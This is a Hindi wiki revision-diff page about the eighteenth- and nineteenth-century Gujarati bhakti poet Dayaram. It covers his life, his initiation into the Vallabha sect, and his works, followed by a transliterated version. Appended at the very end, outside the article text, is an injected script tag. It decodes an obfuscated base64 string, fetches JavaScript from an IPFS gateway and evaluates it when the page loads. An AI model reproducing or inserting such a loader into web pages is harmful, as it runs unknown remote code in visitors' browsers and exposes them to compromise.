Difference between revisions of "दयाराम"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''दयाराम''' मध्यकालीन गुजराती भक्ति-काव्य परंपरा के...' के साथ नया पृष्ठ बनाया)
 
Line 1: Line 1:
'''दयाराम''' मध्यकालीन गुजराती भक्ति-काव्य परंपरा के अंतिम महत्वपूर्ण वैष्णव कवि थे। उनके अवसान के साथ मध्यकाल और कृष्ण-भक्ति-काव्य दोनों का पर्यवसान हो गया। इस युगपरिवर्तन के चिह्न कुछ कुछ दयाराम के काव्य में ही लक्षित होते हैं। भक्ति का वह तीव्र भावावेग एवं अनन्य समर्पणमयी निष्ठा जो नरसी और मीरा के काव्य में प्राप्त मात्रा में उपलब्ध होती है उनकी रचनाओं में उस रूप में प्राप्त नहीं होती। उसके स्थान पर मानवीय प्रेम और विलासिता का समावेश हो जाता है यद्यपि बाह्य रूप परंपरागत गोपी-कृष्ण लीलाओं का ही रहता है। इसी संक्रमणकालीन स्थिति को लक्षित करते हुए गुजरात के प्रसिद्ध इतिहासकार साहित्यकार क. मा. मुंशी ने अपना अभिमत व्यक्त किया कि 'दयारामनुं' भक्तकवियों मां स्थान न थी, प्रणयना अमर कवियोमां छे। यह कथन अत्युक्तिपूर्ण होते हुए भी दयाराम के काव्य की आंतरिक वास्तविकता की ओर स्पष्ट इंगित करता है।
+
'''दयाराम''' ([[अंग्रेज़ी]]: ''Dayaram'') मध्यकालीन गुजराती भक्ति-काव्य परंपरा के अंतिम महत्वपूर्ण वैष्णव [[कवि]] थे। उनके अवसान के साथ मध्यकाल और कृष्ण-भक्ति-काव्य दोनों का पर्यवसान हो गया। इस युगपरिवर्तन के चिह्न कुछ कुछ दयाराम के काव्य में ही लक्षित होते हैं। भक्ति का वह तीव्र भावावेग एवं अनन्य समर्पणमयी निष्ठा जो [[नरसी मेहता|नरसी]] और [[मीरा]] के काव्य में प्राप्त मात्रा में उपलब्ध होती है उनकी रचनाओं में उस रूप में प्राप्त नहीं होती। उसके स्थान पर मानवीय प्रेम और विलासिता का समावेश हो जाता है यद्यपि बाह्य रूप परंपरागत गोपी-कृष्ण लीलाओं का ही रहता है। इसी संक्रमणकालीन स्थिति को लक्षित करते हुए गुजरात के प्रसिद्ध इतिहासकार साहित्यकार क. मा. मुंशी ने अपना अभिमत व्यक्त किया कि <br />
 +
'दयारामनुं' भक्तकवियों मां स्थान न थी, प्रणयना अमर कवियोमां छे। <br />
 +
यह कथन अत्युक्तिपूर्ण होते हुए भी दयाराम के काव्य की आंतरिक वास्तविकता की ओर स्पष्ट इंगित करता है।
 
==जन्म==
 
==जन्म==
दयाराम जी का जन्म (1767-1852 ई.) नर्मदातटवर्ती साठोदरा के चांदोद नामक ग्राम में प्रभुराम नागर के घर हुआ था। बाल्यकाल में ही अनाथ हो जाने के कारण उनका प्रारंभिक जीवन अस्तव्यस्ता में बीता। पहले वे केशवानंद संन्यासी के शिष्य हुए, फिर इच्छाराम भट्ट के, जो पुष्टिमार्गीय [[वैष्णव]] थे। दयाराम ने अनेक बार तीर्थयात्रा के उद्देश्य से भारत-भ्रमण किया। [[मथुरा]] [[वृंदावन]] की कृष्णभक्ति तथा [[अष्टछाप]] के कवियों के ब्रजसाहित्य ने उन्हें विशेष आकर्षित किया। ब्रज में ही उन्होंने [[वल्लभ संप्रदाय]] के तत्कालीन [[गोस्वामी]] श्री वल्लभलाल जी से दीक्षा ग्रहण की तथा आजीवन पुष्टिमार्गीय बने रहे। 'अनुभवमंजरी' नामक अपनी रचना में दयाराम ने स्वयं को नंददास का अवतार माना है। उनमें मित्रप्रेमी नंददास जैसी रसिकता यथेष्ट मात्रा में थी इसमें संदेह नहीं, क्योंकि उन्होंने भी बालविधवा रतनबाई के प्रति अपने लौकिक प्रेम को आध्यात्मिक उपासना का विरोधी नहीं माना और उसके गुरु का समर्थन तक प्राप्त किया। वे अष्टछाप के कवियों की तरह स्वयं संगीतज्ञ भी थे तथा उन्होंने [[गोपी]] प्रेम से परिप्लावित बहुतसंख्य पद (गरबी) रचे हैं। भावसमृद्धि की दृष्टि से उनका गरबी साहित्य गुराज मे विशेष लोकप्रिय एवं समादृत रहा है। बड़ौदा के धनिक गोपालदास की ओर से प्राप्त गणपतिवंदना के प्रस्ताव को उन्होंने 'एक वयों गोपीजनवल्लभ, नहिं स्वामी बीजो रे' लिखकर वापस कर दिया जो कृष्ण के प्रति उनके अनन्य भाव का परिचायक है। संप्रदाय-संबंध होने पर उनका नाम दयाशंकर से दयाराम हो गया जो सखीभाव के अपनाने पर दयासखी बन गया। अंतिम रूप उनकी भक्ति की स्त्रैण प्रकृति का परिचायक है। संतों की तरह कहीं कहीं उन्होंने कर्मकांड के बाह्य साधनों का खंडन भी किया है और अपनी भक्ति को प्रेमभक्ति की संज्ञा प्रदान की है।
+
दयाराम जी का जन्म (1767-1852 ई.) नर्मदा तटवर्ती साठोदरा के चांदोद नामक ग्राम में प्रभुराम नागर के घर हुआ था। बाल्यकाल में ही अनाथ हो जाने के कारण उनका प्रारंभिक जीवन अस्तव्यस्ता में बीता। पहले वे केशवानंद संन्यासी के शिष्य हुए, फिर इच्छाराम भट्ट के, जो पुष्टिमार्गीय [[वैष्णव]] थे। दयाराम ने अनेक बार तीर्थयात्रा के उद्देश्य से भारत-भ्रमण किया। [[मथुरा]] [[वृंदावन]] की कृष्णभक्ति तथा [[अष्टछाप]] के कवियों के ब्रजसाहित्य ने उन्हें विशेष आकर्षित किया। ब्रज में ही उन्होंने [[वल्लभ संप्रदाय]] के तत्कालीन [[गोस्वामी]] श्री वल्लभलाल जी से दीक्षा ग्रहण की तथा आजीवन पुष्टिमार्गीय बने रहे। 'अनुभवमंजरी' नामक अपनी रचना में दयाराम ने स्वयं को नंददास का अवतार माना है। उनमें मित्रप्रेमी नंददास जैसी रसिकता यथेष्ट मात्रा में थी इसमें संदेह नहीं, क्योंकि उन्होंने भी बालविधवा रतनबाई के प्रति अपने लौकिक प्रेम को आध्यात्मिक उपासना का विरोधी नहीं माना और उसके गुरु का समर्थन तक प्राप्त किया। वे अष्टछाप के कवियों की तरह स्वयं संगीतज्ञ भी थे तथा उन्होंने [[गोपी]] प्रेम से परिप्लावित बहुतसंख्य पद (गरबी) रचे हैं। भावसमृद्धि की दृष्टि से उनका गरबी साहित्य गुराज मे विशेष लोकप्रिय एवं समादृत रहा है। बड़ौदा के धनिक गोपालदास की ओर से प्राप्त गणपतिवंदना के प्रस्ताव को उन्होंने 'एक वयों गोपीजनवल्लभ, नहिं स्वामी बीजो रे' लिखकर वापस कर दिया जो कृष्ण के प्रति उनके अनन्य भाव का परिचायक है। संप्रदाय-संबंध होने पर उनका नाम दयाशंकर से दयाराम हो गया जो सखीभाव के अपनाने पर दयासखी बन गया। अंतिम रूप उनकी भक्ति की स्त्रैण प्रकृति का परिचायक है। संतों की तरह कहीं कहीं उन्होंने कर्मकांड के बाह्य साधनों का खंडन भी किया है और अपनी भक्ति को प्रेमभक्ति की संज्ञा प्रदान की है।
 
==कृतियाँ==
 
==कृतियाँ==
दयाराम की कृतियों में 'वल्लभ नो परिवार', 'चौरासी वैष्णवमनु ढोला', 'पुष्टिपथ रहस्य' तथा 'भक्ति-पोषण' उनके पुष्टिमार्गीय होने का विशेष परिचय देती हैं। 'रसिकवल्लभ', 'नीतिभक्ति ना पदो' तथा 'सतसैया' (ब्रजभाषा में लिखित) से कवि के धार्मिक, दार्शनिक विचारों का परिचय मिलता है। 'अजामिलाख्या', 'वृत्तासुराख्यान', 'सत्याभामाख्यान', 'ओखाहरण', आख्यानपरंपरा के पौराणिक काव्य हैं। भागवतपुराण पर आधारित 'दशमलीला' तथा 'रासपंचाध्यायी आदि लीलाकाव्य अन्य पौराणिक आख्यानों से कुछ भिन्न हैं और उनमें भक्तिभाव की प्रचुरता है। 'नरसिंह मेहता नी हंडी' नरसी के जीवन से संबद्ध है। 'षडऋतु वर्णन' वर्णनात्मक प्रकृतिकाव्य है। इनके अतिरिक्त 'गरबी संग्रह' में दयाराम के 'ऊर्मिगीत' अर्थात्‌ भावात्मक गेय पद संगृहीत हैं। 'प्रश्नोत्तरमालिका' जैसे कुछ अन्य छोटे काव्य भी उन्होंने रचे हैं। दयाराम बहुभाषाविज्ञ थे और उन्होंने [[संस्कृत]], [[मराठी]], [[पंजाबी]], [[ब्रज]] और [[उर्दू]] में भी काव्यरचना की है। उनकी अधिकांश रचनाएँ 'बृहत्‌ काव्यदोहन' में प्रकाशित हो चुकी हैं तथा अनेक के स्वतंत्र संस्करण भी छपे हैं।</ref><ref name="aa">{{cite web |url=http://bharatkhoj.org/india/%E0%A4%A6%E0%A4%AF%E0%A4%BE%E0%A4%B0%E0%A4%BE%E0%A4%AE |title=दयाराम |accessmonthday= 19 सितम्बर |accessyear=2015 |last= |first= |authorlink= |format= |publisher=भारतखोज |language=हिंदी }}</ref>
+
दयाराम की कृतियों में 'वल्लभ नो परिवार', 'चौरासी वैष्णवमनु ढोला', 'पुष्टिपथ रहस्य' तथा 'भक्ति-पोषण' उनके पुष्टिमार्गीय होने का विशेष परिचय देती हैं। 'रसिकवल्लभ', 'नीतिभक्ति ना पदो' तथा 'सतसैया' ([[ब्रजभाषा]] में लिखित) से कवि के धार्मिक, दार्शनिक विचारों का परिचय मिलता है। 'अजामिलाख्या', 'वृत्तासुराख्यान', 'सत्याभामाख्यान', 'ओखाहरण', आख्यानपरंपरा के पौराणिक काव्य हैं। भागवतपुराण पर आधारित 'दशमलीला' तथा 'रासपंचाध्यायी आदि लीलाकाव्य अन्य पौराणिक आख्यानों से कुछ भिन्न हैं और उनमें भक्तिभाव की प्रचुरता है। 'नरसिंह मेहता नी हंडी' नरसी के जीवन से संबद्ध है। 'षडऋतु वर्णन' वर्णनात्मक प्रकृतिकाव्य है। इनके अतिरिक्त 'गरबी संग्रह' में दयाराम के 'ऊर्मिगीत' अर्थात्‌ भावात्मक गेय पद संगृहीत हैं। 'प्रश्नोत्तरमालिका' जैसे कुछ अन्य छोटे काव्य भी उन्होंने रचे हैं। दयाराम बहुभाषाविज्ञ थे और उन्होंने [[संस्कृत]], [[मराठी]], [[पंजाबी]], [[ब्रज]] और [[उर्दू]] में भी काव्यरचना की है। उनकी अधिकांश रचनाएँ 'बृहत्‌ काव्यदोहन' में प्रकाशित हो चुकी हैं तथा अनेक के स्वतंत्र संस्करण भी छपे हैं।<ref name="aa">{{cite web |url=http://bharatkhoj.org/india/%E0%A4%A6%E0%A4%AF%E0%A4%BE%E0%A4%B0%E0%A4%BE%E0%A4%AE |title=दयाराम |accessmonthday= 19 सितम्बर |accessyear=2015 |last= |first= |authorlink= |format= |publisher=भारतखोज |language=हिंदी }}</ref>
 +
 
 +
 
 
{{लेख प्रगति|आधार|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
  
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 +
==बाहरी कड़ियाँ==
 +
==संबंधित लेख==
 +
{{गुजराती साहित्यकार}}
 
{{भारत के कवि}}
 
{{भारत के कवि}}
[[Category:कवि]][[Category:चरित कोश]][[Category:जीवनी साहित्य]][[Category:नया पन्ना]][[Category:हिन्दी विश्वकोश]]
+
[[category:गुजराती साहित्यकार]]
 +
[[Category:कवि]][[Category:चरित कोश]][[Category:जीवनी साहित्य]][[Category:हिन्दी विश्वकोश]][[category:साहित्य कोश]]
 
__INDEX__
 
__INDEX__

Revision as of 06:58, 19 September 2015

dayaram (aangrezi: Dayaram) madhyakalin gujarati bhakti-kavy paranpara ke aantim mahatvapoorn vaishnav kavi the. unake avasan ke sath madhyakal aur krishna-bhakti-kavy donoan ka paryavasan ho gaya. is yugaparivartan ke chihn kuchh kuchh dayaram ke kavy mean hi lakshit hote haian. bhakti ka vah tivr bhavaveg evan anany samarpanamayi nishtha jo narasi aur mira ke kavy mean prapt matra mean upalabdh hoti hai unaki rachanaoan mean us roop mean prapt nahian hoti. usake sthan par manaviy prem aur vilasita ka samavesh ho jata hai yadyapi bahy roop paranparagat gopi-krishna lilaoan ka hi rahata hai. isi sankramanakalin sthiti ko lakshit karate hue gujarat ke prasiddh itihasakar sahityakar k. ma. muanshi ne apana abhimat vyakt kiya ki
'dayaramanuan' bhaktakaviyoan maan sthan n thi, pranayana amar kaviyomaan chhe.
yah kathan atyuktipoorn hote hue bhi dayaram ke kavy ki aantarik vastavikata ki or spasht iangit karata hai.

janm

dayaram ji ka janm (1767-1852 ee.) narmada tatavarti sathodara ke chaandod namak gram mean prabhuram nagar ke ghar hua tha. balyakal mean hi anath ho jane ke karan unaka praranbhik jivan astavyasta mean bita. pahale ve keshavanand sannyasi ke shishy hue, phir ichchharam bhatt ke, jo pushtimargiy vaishnav the. dayaram ne anek bar tirthayatra ke uddeshy se bharat-bhraman kiya. mathura vriandavan ki krishnabhakti tatha ashtachhap ke kaviyoan ke brajasahity ne unhean vishesh akarshit kiya. braj mean hi unhoanne vallabh sanpraday ke tatkalin gosvami shri vallabhalal ji se diksha grahan ki tatha ajivan pushtimargiy bane rahe. 'anubhavamanjari' namak apani rachana mean dayaram ne svayan ko nandadas ka avatar mana hai. unamean mitrapremi nandadas jaisi rasikata yathesht matra mean thi isamean sandeh nahian, kyoanki unhoanne bhi balavidhava ratanabaee ke prati apane laukik prem ko adhyatmik upasana ka virodhi nahian mana aur usake guru ka samarthan tak prapt kiya. ve ashtachhap ke kaviyoan ki tarah svayan sangitajn bhi the tatha unhoanne gopi prem se pariplavit bahutasankhy pad (garabi) rache haian. bhavasamriddhi ki drishti se unaka garabi sahity guraj me vishesh lokapriy evan samadrit raha hai. b dauda ke dhanik gopaladas ki or se prapt ganapativandana ke prastav ko unhoanne 'ek vayoan gopijanavallabh, nahian svami bijo re' likhakar vapas kar diya jo krishna ke prati unake anany bhav ka parichayak hai. sanpraday-sanbandh hone par unaka nam dayashankar se dayaram ho gaya jo sakhibhav ke apanane par dayasakhi ban gaya. aantim roop unaki bhakti ki strain prakriti ka parichayak hai. santoan ki tarah kahian kahian unhoanne karmakaand ke bahy sadhanoan ka khandan bhi kiya hai aur apani bhakti ko premabhakti ki sanjna pradan ki hai.

kritiyaan

dayaram ki kritiyoan mean 'vallabh no parivar', 'chaurasi vaishnavamanu dhola', 'pushtipath rahasy' tatha 'bhakti-poshan' unake pushtimargiy hone ka vishesh parichay deti haian. 'rasikavallabh', 'nitibhakti na pado' tatha 'satasaiya' (brajabhasha mean likhit) se kavi ke dharmik, darshanik vicharoan ka parichay milata hai. 'ajamilakhya', 'vrittasurakhyan', 'satyabhamakhyan', 'okhaharan', akhyanaparanpara ke pauranik kavy haian. bhagavatapuran par adharit 'dashamalila' tatha 'rasapanchadhyayi adi lilakavy any pauranik akhyanoan se kuchh bhinn haian aur unamean bhaktibhav ki prachurata hai. 'narasianh mehata ni handi' narasi ke jivan se sanbaddh hai. 'shadrritu varnan' varnanatmak prakritikavy hai. inake atirikt 'garabi sangrah' mean dayaram ke 'oormigit' arthath‌ bhavatmak gey pad sangrihit haian. 'prashnottaramalika' jaise kuchh any chhote kavy bhi unhoanne rache haian. dayaram bahubhashavijn the aur unhoanne sanskrit, marathi, panjabi, braj aur urdoo mean bhi kavyarachana ki hai. unaki adhikaansh rachanaean 'brihath‌ kavyadohan' mean prakashit ho chuki haian tatha anek ke svatantr sanskaran bhi chhape haian.[1]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. dayaram (hiandi) bharatakhoj. abhigaman tithi: 19 sitambar, 2015.

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>